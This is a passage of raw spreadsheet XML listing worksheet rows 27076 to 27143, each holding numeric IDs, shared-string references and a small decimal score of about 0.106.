      <c r="C27076" s="2" t="s">
        <v>26021</v>
      </c>
      <c r="D27076" s="2">
        <v>1.0</v>
      </c>
      <c r="E27076" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27076" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27077" ht="15.75" customHeight="1">
      <c r="A27077" s="1">
        <v>22523.0</v>
      </c>
      <c r="B27077" s="2">
        <v>3.7672208E7</v>
      </c>
      <c r="C27077" s="2" t="s">
        <v>26022</v>
      </c>
      <c r="D27077" s="2">
        <v>1.0</v>
      </c>
      <c r="E27077" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27077" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27078" ht="15.75" customHeight="1">
      <c r="A27078" s="1">
        <v>22728.0</v>
      </c>
      <c r="B27078" s="2">
        <v>4.3874337E7</v>
      </c>
      <c r="C27078" s="2" t="s">
        <v>26023</v>
      </c>
      <c r="D27078" s="2">
        <v>1.0</v>
      </c>
      <c r="E27078" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27078" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27079" ht="15.75" customHeight="1">
      <c r="A27079" s="1">
        <v>22760.0</v>
      </c>
      <c r="B27079" s="2">
        <v>4.4768007E7</v>
      </c>
      <c r="C27079" s="2" t="s">
        <v>26024</v>
      </c>
      <c r="D27079" s="2">
        <v>1.0</v>
      </c>
      <c r="E27079" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27079" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27080" ht="15.75" customHeight="1">
      <c r="A27080" s="1">
        <v>24683.0</v>
      </c>
      <c r="B27080" s="2">
        <v>1.1604848E7</v>
      </c>
      <c r="C27080" s="2" t="s">
        <v>26025</v>
      </c>
      <c r="D27080" s="2">
        <v>1.0</v>
      </c>
      <c r="E27080" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27080" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27081" ht="15.75" customHeight="1">
      <c r="A27081" s="1">
        <v>24693.0</v>
      </c>
      <c r="B27081" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C27081" s="2" t="s">
        <v>26026</v>
      </c>
      <c r="D27081" s="2">
        <v>1.0</v>
      </c>
      <c r="E27081" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27081" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27082" ht="15.75" customHeight="1">
      <c r="A27082" s="1">
        <v>25316.0</v>
      </c>
      <c r="B27082" s="2">
        <v>1.3433227E7</v>
      </c>
      <c r="C27082" s="2" t="s">
        <v>26027</v>
      </c>
      <c r="D27082" s="2">
        <v>1.0</v>
      </c>
      <c r="E27082" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27082" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27083" ht="15.75" customHeight="1">
      <c r="A27083" s="1">
        <v>25817.0</v>
      </c>
      <c r="B27083" s="2">
        <v>1.4768341E7</v>
      </c>
      <c r="C27083" s="2" t="s">
        <v>26028</v>
      </c>
      <c r="D27083" s="2">
        <v>1.0</v>
      </c>
      <c r="E27083" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27083" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27084" ht="15.75" customHeight="1">
      <c r="A27084" s="1">
        <v>27965.0</v>
      </c>
      <c r="B27084" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C27084" s="2" t="s">
        <v>26029</v>
      </c>
      <c r="D27084" s="2">
        <v>1.0</v>
      </c>
      <c r="E27084" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27084" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27085" ht="15.75" customHeight="1">
      <c r="A27085" s="1">
        <v>28547.0</v>
      </c>
      <c r="B27085" s="2">
        <v>2.6858152E7</v>
      </c>
      <c r="C27085" s="2" t="s">
        <v>26030</v>
      </c>
      <c r="D27085" s="2">
        <v>1.0</v>
      </c>
      <c r="E27085" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27085" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27086" ht="15.75" customHeight="1">
      <c r="A27086" s="1">
        <v>29752.0</v>
      </c>
      <c r="B27086" s="2">
        <v>3.4763372E7</v>
      </c>
      <c r="C27086" s="2" t="s">
        <v>26031</v>
      </c>
      <c r="D27086" s="2">
        <v>1.0</v>
      </c>
      <c r="E27086" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27086" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27087" ht="15.75" customHeight="1">
      <c r="A27087" s="1">
        <v>32245.0</v>
      </c>
      <c r="B27087" s="2">
        <v>5506643.0</v>
      </c>
      <c r="C27087" s="2" t="s">
        <v>23814</v>
      </c>
      <c r="D27087" s="2">
        <v>1.0</v>
      </c>
      <c r="E27087" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27087" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27088" ht="15.75" customHeight="1">
      <c r="A27088" s="1">
        <v>32622.0</v>
      </c>
      <c r="B27088" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C27088" s="2" t="s">
        <v>26032</v>
      </c>
      <c r="D27088" s="2">
        <v>1.0</v>
      </c>
      <c r="E27088" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27088" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27089" ht="15.75" customHeight="1">
      <c r="A27089" s="1">
        <v>32637.0</v>
      </c>
      <c r="B27089" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C27089" s="2" t="s">
        <v>26033</v>
      </c>
      <c r="D27089" s="2">
        <v>1.0</v>
      </c>
      <c r="E27089" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27089" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27090" ht="15.75" customHeight="1">
      <c r="A27090" s="1">
        <v>33971.0</v>
      </c>
      <c r="B27090" s="2">
        <v>9386004.0</v>
      </c>
      <c r="C27090" s="2" t="s">
        <v>26034</v>
      </c>
      <c r="D27090" s="2">
        <v>1.0</v>
      </c>
      <c r="E27090" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27090" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27091" ht="15.75" customHeight="1">
      <c r="A27091" s="1">
        <v>34033.0</v>
      </c>
      <c r="B27091" s="2">
        <v>9555711.0</v>
      </c>
      <c r="C27091" s="2" t="s">
        <v>26027</v>
      </c>
      <c r="D27091" s="2">
        <v>1.0</v>
      </c>
      <c r="E27091" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27091" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27092" ht="15.75" customHeight="1">
      <c r="A27092" s="1">
        <v>34113.0</v>
      </c>
      <c r="B27092" s="2">
        <v>9742478.0</v>
      </c>
      <c r="C27092" s="2" t="s">
        <v>26035</v>
      </c>
      <c r="D27092" s="2">
        <v>1.0</v>
      </c>
      <c r="E27092" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27092" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="27093" ht="15.75" customHeight="1">
      <c r="A27093" s="1">
        <v>13499.0</v>
      </c>
      <c r="B27093" s="2">
        <v>3.541985E7</v>
      </c>
      <c r="C27093" s="2" t="s">
        <v>26036</v>
      </c>
      <c r="D27093" s="2">
        <v>1.0</v>
      </c>
      <c r="E27093" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27093" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27094" ht="15.75" customHeight="1">
      <c r="A27094" s="1">
        <v>13901.0</v>
      </c>
      <c r="B27094" s="2">
        <v>3.7057732E7</v>
      </c>
      <c r="C27094" s="2" t="s">
        <v>26037</v>
      </c>
      <c r="D27094" s="2">
        <v>1.0</v>
      </c>
      <c r="E27094" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27094" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27095" ht="15.75" customHeight="1">
      <c r="A27095" s="1">
        <v>16110.0</v>
      </c>
      <c r="B27095" s="2">
        <v>4.5399501E7</v>
      </c>
      <c r="C27095" s="2" t="s">
        <v>26038</v>
      </c>
      <c r="D27095" s="2">
        <v>1.0</v>
      </c>
      <c r="E27095" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27095" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27096" ht="15.75" customHeight="1">
      <c r="A27096" s="1">
        <v>20085.0</v>
      </c>
      <c r="B27096" s="2">
        <v>9330547.0</v>
      </c>
      <c r="C27096" s="2" t="s">
        <v>26039</v>
      </c>
      <c r="D27096" s="2">
        <v>1.0</v>
      </c>
      <c r="E27096" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27096" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27097" ht="15.75" customHeight="1">
      <c r="A27097" s="1">
        <v>31437.0</v>
      </c>
      <c r="B27097" s="2">
        <v>5.0171706E7</v>
      </c>
      <c r="C27097" s="2" t="s">
        <v>26040</v>
      </c>
      <c r="D27097" s="2">
        <v>1.0</v>
      </c>
      <c r="E27097" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27097" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27098" ht="15.75" customHeight="1">
      <c r="A27098" s="1">
        <v>33445.0</v>
      </c>
      <c r="B27098" s="2">
        <v>7859448.0</v>
      </c>
      <c r="C27098" s="2" t="s">
        <v>26041</v>
      </c>
      <c r="D27098" s="2">
        <v>1.0</v>
      </c>
      <c r="E27098" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27098" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="27099" ht="15.75" customHeight="1">
      <c r="A27099" s="1">
        <v>21669.0</v>
      </c>
      <c r="B27099" s="2">
        <v>2.5016995E7</v>
      </c>
      <c r="C27099" s="2" t="s">
        <v>23987</v>
      </c>
      <c r="D27099" s="2">
        <v>1.0</v>
      </c>
      <c r="E27099" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27099" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="27100" ht="15.75" customHeight="1">
      <c r="A27100" s="1">
        <v>17544.0</v>
      </c>
      <c r="B27100" s="2">
        <v>5.0150676E7</v>
      </c>
      <c r="C27100" s="2" t="s">
        <v>26042</v>
      </c>
      <c r="D27100" s="2">
        <v>1.0</v>
      </c>
      <c r="E27100" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27100" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="27101" ht="15.75" customHeight="1">
      <c r="A27101" s="1">
        <v>20921.0</v>
      </c>
      <c r="B27101" s="2">
        <v>1.6388336E7</v>
      </c>
      <c r="C27101" s="2" t="s">
        <v>26043</v>
      </c>
      <c r="D27101" s="2">
        <v>1.0</v>
      </c>
      <c r="E27101" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27101" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="27102" ht="15.75" customHeight="1">
      <c r="A27102" s="1">
        <v>22975.0</v>
      </c>
      <c r="B27102" s="2">
        <v>4926401.0</v>
      </c>
      <c r="C27102" s="2" t="s">
        <v>26044</v>
      </c>
      <c r="D27102" s="2">
        <v>1.0</v>
      </c>
      <c r="E27102" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27102" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="27103" ht="15.75" customHeight="1">
      <c r="A27103" s="1">
        <v>27090.0</v>
      </c>
      <c r="B27103" s="2">
        <v>2.0503767E7</v>
      </c>
      <c r="C27103" s="2" t="s">
        <v>25965</v>
      </c>
      <c r="D27103" s="2">
        <v>1.0</v>
      </c>
      <c r="E27103" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27103" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="27104" ht="15.75" customHeight="1">
      <c r="A27104" s="1">
        <v>31217.0</v>
      </c>
      <c r="B27104" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C27104" s="2" t="s">
        <v>26045</v>
      </c>
      <c r="D27104" s="2">
        <v>1.0</v>
      </c>
      <c r="E27104" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27104" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="27105" ht="15.75" customHeight="1">
      <c r="A27105" s="1">
        <v>19275.0</v>
      </c>
      <c r="B27105" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C27105" s="2" t="s">
        <v>26046</v>
      </c>
      <c r="D27105" s="2">
        <v>1.0</v>
      </c>
      <c r="E27105" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27105" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="27106" ht="15.75" customHeight="1">
      <c r="A27106" s="1">
        <v>22852.0</v>
      </c>
      <c r="B27106" s="2">
        <v>4.7031063E7</v>
      </c>
      <c r="C27106" s="2" t="s">
        <v>26047</v>
      </c>
      <c r="D27106" s="2">
        <v>1.0</v>
      </c>
      <c r="E27106" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27106" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="27107" ht="15.75" customHeight="1">
      <c r="A27107" s="1">
        <v>246.0</v>
      </c>
      <c r="B27107" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C27107" s="2" t="s">
        <v>26048</v>
      </c>
      <c r="D27107" s="2">
        <v>1.0</v>
      </c>
      <c r="E27107" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27107" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27108" ht="15.75" customHeight="1">
      <c r="A27108" s="1">
        <v>404.0</v>
      </c>
      <c r="B27108" s="2">
        <v>1.6680522E7</v>
      </c>
      <c r="C27108" s="2" t="s">
        <v>26049</v>
      </c>
      <c r="D27108" s="2">
        <v>1.0</v>
      </c>
      <c r="E27108" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27108" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27109" ht="15.75" customHeight="1">
      <c r="A27109" s="1">
        <v>4586.0</v>
      </c>
      <c r="B27109" s="2">
        <v>4.2793638E7</v>
      </c>
      <c r="C27109" s="2" t="s">
        <v>26050</v>
      </c>
      <c r="D27109" s="2">
        <v>1.0</v>
      </c>
      <c r="E27109" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27109" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27110" ht="15.75" customHeight="1">
      <c r="A27110" s="1">
        <v>9644.0</v>
      </c>
      <c r="B27110" s="2">
        <v>5.6242752E7</v>
      </c>
      <c r="C27110" s="2" t="s">
        <v>26051</v>
      </c>
      <c r="D27110" s="2">
        <v>1.0</v>
      </c>
      <c r="E27110" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27110" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27111" ht="15.75" customHeight="1">
      <c r="A27111" s="1">
        <v>18658.0</v>
      </c>
      <c r="B27111" s="2">
        <v>5.3490728E7</v>
      </c>
      <c r="C27111" s="2" t="s">
        <v>26052</v>
      </c>
      <c r="D27111" s="2">
        <v>1.0</v>
      </c>
      <c r="E27111" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27111" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27112" ht="15.75" customHeight="1">
      <c r="A27112" s="1">
        <v>19265.0</v>
      </c>
      <c r="B27112" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C27112" s="2" t="s">
        <v>26053</v>
      </c>
      <c r="D27112" s="2">
        <v>1.0</v>
      </c>
      <c r="E27112" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27112" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27113" ht="15.75" customHeight="1">
      <c r="A27113" s="1">
        <v>21434.0</v>
      </c>
      <c r="B27113" s="2">
        <v>2.2168175E7</v>
      </c>
      <c r="C27113" s="2" t="s">
        <v>26054</v>
      </c>
      <c r="D27113" s="2">
        <v>1.0</v>
      </c>
      <c r="E27113" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27113" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27114" ht="15.75" customHeight="1">
      <c r="A27114" s="1">
        <v>28324.0</v>
      </c>
      <c r="B27114" s="2">
        <v>2.5814124E7</v>
      </c>
      <c r="C27114" s="2" t="s">
        <v>26055</v>
      </c>
      <c r="D27114" s="2">
        <v>1.0</v>
      </c>
      <c r="E27114" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27114" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27115" ht="15.75" customHeight="1">
      <c r="A27115" s="1">
        <v>31876.0</v>
      </c>
      <c r="B27115" s="2">
        <v>5286062.0</v>
      </c>
      <c r="C27115" s="2" t="s">
        <v>26056</v>
      </c>
      <c r="D27115" s="2">
        <v>1.0</v>
      </c>
      <c r="E27115" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27115" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="27116" ht="15.75" customHeight="1">
      <c r="A27116" s="1">
        <v>1415.0</v>
      </c>
      <c r="B27116" s="2">
        <v>2.649065E7</v>
      </c>
      <c r="C27116" s="2" t="s">
        <v>26057</v>
      </c>
      <c r="D27116" s="2">
        <v>1.0</v>
      </c>
      <c r="E27116" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27116" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27117" ht="15.75" customHeight="1">
      <c r="A27117" s="1">
        <v>2155.0</v>
      </c>
      <c r="B27117" s="2">
        <v>3.1665925E7</v>
      </c>
      <c r="C27117" s="2" t="s">
        <v>26058</v>
      </c>
      <c r="D27117" s="2">
        <v>1.0</v>
      </c>
      <c r="E27117" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27117" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27118" ht="15.75" customHeight="1">
      <c r="A27118" s="1">
        <v>6317.0</v>
      </c>
      <c r="B27118" s="2">
        <v>4.8251474E7</v>
      </c>
      <c r="C27118" s="2" t="s">
        <v>26059</v>
      </c>
      <c r="D27118" s="2">
        <v>1.0</v>
      </c>
      <c r="E27118" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27118" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27119" ht="15.75" customHeight="1">
      <c r="A27119" s="1">
        <v>11539.0</v>
      </c>
      <c r="B27119" s="2">
        <v>2.2594118E7</v>
      </c>
      <c r="C27119" s="2" t="s">
        <v>26060</v>
      </c>
      <c r="D27119" s="2">
        <v>1.0</v>
      </c>
      <c r="E27119" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27119" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27120" ht="15.75" customHeight="1">
      <c r="A27120" s="1">
        <v>12901.0</v>
      </c>
      <c r="B27120" s="2">
        <v>3.2074499E7</v>
      </c>
      <c r="C27120" s="2" t="s">
        <v>26061</v>
      </c>
      <c r="D27120" s="2">
        <v>1.0</v>
      </c>
      <c r="E27120" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27120" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27121" ht="15.75" customHeight="1">
      <c r="A27121" s="1">
        <v>13022.0</v>
      </c>
      <c r="B27121" s="2">
        <v>3.2938088E7</v>
      </c>
      <c r="C27121" s="2" t="s">
        <v>26062</v>
      </c>
      <c r="D27121" s="2">
        <v>1.0</v>
      </c>
      <c r="E27121" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27121" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27122" ht="15.75" customHeight="1">
      <c r="A27122" s="1">
        <v>15458.0</v>
      </c>
      <c r="B27122" s="2">
        <v>4.3081153E7</v>
      </c>
      <c r="C27122" s="2" t="s">
        <v>26063</v>
      </c>
      <c r="D27122" s="2">
        <v>1.0</v>
      </c>
      <c r="E27122" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27122" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27123" ht="15.75" customHeight="1">
      <c r="A27123" s="1">
        <v>16800.0</v>
      </c>
      <c r="B27123" s="2">
        <v>4.7778554E7</v>
      </c>
      <c r="C27123" s="2" t="s">
        <v>26064</v>
      </c>
      <c r="D27123" s="2">
        <v>1.0</v>
      </c>
      <c r="E27123" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27123" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27124" ht="15.75" customHeight="1">
      <c r="A27124" s="1">
        <v>21499.0</v>
      </c>
      <c r="B27124" s="2">
        <v>2.3112927E7</v>
      </c>
      <c r="C27124" s="2" t="s">
        <v>6848</v>
      </c>
      <c r="D27124" s="2">
        <v>1.0</v>
      </c>
      <c r="E27124" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27124" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27125" ht="15.75" customHeight="1">
      <c r="A27125" s="1">
        <v>32459.0</v>
      </c>
      <c r="B27125" s="2">
        <v>5673487.0</v>
      </c>
      <c r="C27125" s="2" t="s">
        <v>26065</v>
      </c>
      <c r="D27125" s="2">
        <v>1.0</v>
      </c>
      <c r="E27125" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27125" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="27126" ht="15.75" customHeight="1">
      <c r="A27126" s="1">
        <v>4172.0</v>
      </c>
      <c r="B27126" s="2">
        <v>4.1552502E7</v>
      </c>
      <c r="C27126" s="2" t="s">
        <v>26066</v>
      </c>
      <c r="D27126" s="2">
        <v>1.0</v>
      </c>
      <c r="E27126" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27126" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="27127" ht="15.75" customHeight="1">
      <c r="A27127" s="1">
        <v>13770.0</v>
      </c>
      <c r="B27127" s="2">
        <v>3.6528626E7</v>
      </c>
      <c r="C27127" s="2" t="s">
        <v>26067</v>
      </c>
      <c r="D27127" s="2">
        <v>1.0</v>
      </c>
      <c r="E27127" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27127" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="27128" ht="15.75" customHeight="1">
      <c r="A27128" s="1">
        <v>19666.0</v>
      </c>
      <c r="B27128" s="2">
        <v>5.636915E7</v>
      </c>
      <c r="C27128" s="2" t="s">
        <v>26068</v>
      </c>
      <c r="D27128" s="2">
        <v>1.0</v>
      </c>
      <c r="E27128" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27128" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="27129" ht="15.75" customHeight="1">
      <c r="A27129" s="1">
        <v>21920.0</v>
      </c>
      <c r="B27129" s="2">
        <v>2.8345503E7</v>
      </c>
      <c r="C27129" s="2" t="s">
        <v>26069</v>
      </c>
      <c r="D27129" s="2">
        <v>1.0</v>
      </c>
      <c r="E27129" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27129" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="27130" ht="15.75" customHeight="1">
      <c r="A27130" s="1">
        <v>26182.0</v>
      </c>
      <c r="B27130" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C27130" s="2" t="s">
        <v>26070</v>
      </c>
      <c r="D27130" s="2">
        <v>1.0</v>
      </c>
      <c r="E27130" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27130" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="27131" ht="15.75" customHeight="1">
      <c r="A27131" s="1">
        <v>16010.0</v>
      </c>
      <c r="B27131" s="2">
        <v>4.5011263E7</v>
      </c>
      <c r="C27131" s="2" t="s">
        <v>26071</v>
      </c>
      <c r="D27131" s="2">
        <v>1.0</v>
      </c>
      <c r="E27131" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27131" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="27132" ht="15.75" customHeight="1">
      <c r="A27132" s="1">
        <v>23096.0</v>
      </c>
      <c r="B27132" s="2">
        <v>5076273.0</v>
      </c>
      <c r="C27132" s="2" t="s">
        <v>26072</v>
      </c>
      <c r="D27132" s="2">
        <v>1.0</v>
      </c>
      <c r="E27132" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27132" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="27133" ht="15.75" customHeight="1">
      <c r="A27133" s="1">
        <v>190.0</v>
      </c>
      <c r="B27133" s="2">
        <v>1.4302524E7</v>
      </c>
      <c r="C27133" s="2" t="s">
        <v>26073</v>
      </c>
      <c r="D27133" s="2">
        <v>1.0</v>
      </c>
      <c r="E27133" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27133" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="27134" ht="15.75" customHeight="1">
      <c r="A27134" s="1">
        <v>27643.0</v>
      </c>
      <c r="B27134" s="2">
        <v>2.2751795E7</v>
      </c>
      <c r="C27134" s="2" t="s">
        <v>26074</v>
      </c>
      <c r="D27134" s="2">
        <v>1.0</v>
      </c>
      <c r="E27134" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27134" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="27135" ht="15.75" customHeight="1">
      <c r="A27135" s="1">
        <v>32567.0</v>
      </c>
      <c r="B27135" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C27135" s="2" t="s">
        <v>26075</v>
      </c>
      <c r="D27135" s="2">
        <v>1.0</v>
      </c>
      <c r="E27135" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27135" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="27136" ht="15.75" customHeight="1">
      <c r="A27136" s="1">
        <v>977.0</v>
      </c>
      <c r="B27136" s="2">
        <v>2.2791226E7</v>
      </c>
      <c r="C27136" s="2" t="s">
        <v>26076</v>
      </c>
      <c r="D27136" s="2">
        <v>1.0</v>
      </c>
      <c r="E27136" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27136" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27137" ht="15.75" customHeight="1">
      <c r="A27137" s="1">
        <v>2923.0</v>
      </c>
      <c r="B27137" s="2">
        <v>3.5864503E7</v>
      </c>
      <c r="C27137" s="2" t="s">
        <v>26077</v>
      </c>
      <c r="D27137" s="2">
        <v>1.0</v>
      </c>
      <c r="E27137" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27137" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27138" ht="15.75" customHeight="1">
      <c r="A27138" s="1">
        <v>3744.0</v>
      </c>
      <c r="B27138" s="2">
        <v>3.9689362E7</v>
      </c>
      <c r="C27138" s="2" t="s">
        <v>26078</v>
      </c>
      <c r="D27138" s="2">
        <v>1.0</v>
      </c>
      <c r="E27138" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27138" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27139" ht="15.75" customHeight="1">
      <c r="A27139" s="1">
        <v>4071.0</v>
      </c>
      <c r="B27139" s="2">
        <v>4.1166132E7</v>
      </c>
      <c r="C27139" s="2" t="s">
        <v>26079</v>
      </c>
      <c r="D27139" s="2">
        <v>1.0</v>
      </c>
      <c r="E27139" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27139" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27140" ht="15.75" customHeight="1">
      <c r="A27140" s="1">
        <v>5830.0</v>
      </c>
      <c r="B27140" s="2">
        <v>4.6893731E7</v>
      </c>
      <c r="C27140" s="2" t="s">
        <v>26080</v>
      </c>
      <c r="D27140" s="2">
        <v>1.0</v>
      </c>
      <c r="E27140" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27140" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27141" ht="15.75" customHeight="1">
      <c r="A27141" s="1">
        <v>14033.0</v>
      </c>
      <c r="B27141" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C27141" s="2" t="s">
        <v>26081</v>
      </c>
      <c r="D27141" s="2">
        <v>1.0</v>
      </c>
      <c r="E27141" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27141" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27142" ht="15.75" customHeight="1">
      <c r="A27142" s="1">
        <v>15127.0</v>
      </c>
      <c r="B27142" s="2">
        <v>4.1887267E7</v>
      </c>
      <c r="C27142" s="2" t="s">
        <v>26082</v>
      </c>
      <c r="D27142" s="2">
        <v>1.0</v>
      </c>
      <c r="E27142" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27142" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27143" ht="15.75" customHeight="1">
      <c r="A27143" s="1">
        <v>17675.0</v>
      </c>
      <c r="B27143" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C27143" s="2" t="s">
        <v>26083</v>
      </c>
